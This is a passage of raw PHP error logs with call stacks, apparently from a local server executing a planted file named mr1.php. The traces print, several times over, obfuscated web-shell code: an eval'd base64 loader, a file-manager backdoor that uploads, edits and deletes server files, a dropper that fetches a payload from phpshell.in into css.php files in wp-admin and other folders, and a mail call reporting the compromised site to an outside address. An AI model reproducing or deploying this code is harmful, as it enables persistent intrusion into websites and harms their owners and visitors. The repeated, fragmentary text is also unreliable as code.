';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3514541328fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:147 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/images/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 162
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3847541968fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:162
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 163
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3872541968fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:163
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 164
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.3895541968fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:164
( ! ) Warning: fopen(C:/wamp64/www/wp-admin/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 168
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
